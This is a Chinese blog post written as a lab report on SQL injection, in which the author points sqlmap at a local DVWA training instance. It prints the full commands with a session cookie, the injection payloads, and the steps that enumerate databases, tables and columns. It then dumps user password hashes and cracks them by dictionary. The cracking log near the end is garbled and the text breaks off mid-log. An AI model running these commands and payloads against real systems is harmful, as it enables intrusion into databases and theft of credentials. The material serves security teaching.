web渗透测试实战-SQLMAP

最新推荐文章于 2024-04-30 12:58:04 发布
最新推荐文章于 2024-04-30 12:58:04 发布
阅读量8.1k 收藏 15
点赞数 3
分类专栏: Windows网络服务渗透测试实战 文章标签: 安全 web安全
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/c_lanxiaofang/article/details/124978832
版权

一、实验项目名称

web渗透测试实战-SQLMAP

二、实验目的及要求

熟悉SQL注入漏洞原理

熟悉SQLMAP工具使用。

1、获取数据库信息:数据库漏洞、数据库名、数据库版本等

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db

 

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/

2、获取数据库表名

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/

3、获取数据库指定表的字段

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/

4、获取用户名和密码(字段直接逗号隔开)

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[e99a18c428cb38d5f260853678922e0309:39:12' [INFO] cracked password 'abc123' for hash '
[' for hash '09:39:148d3533d75ae2c3966d7e0d4fcc69216b] ['
[' [09:39:17INFO] [] current status: odrik... /INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
[] [09:39:18INFO] [] cracked password 'INFOpassword] current status: rootp... |' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:3409:39:34] [] [INFOINFO] current status: arym1... /] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
[09:43:02] [INFO] using suffix '16'
[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
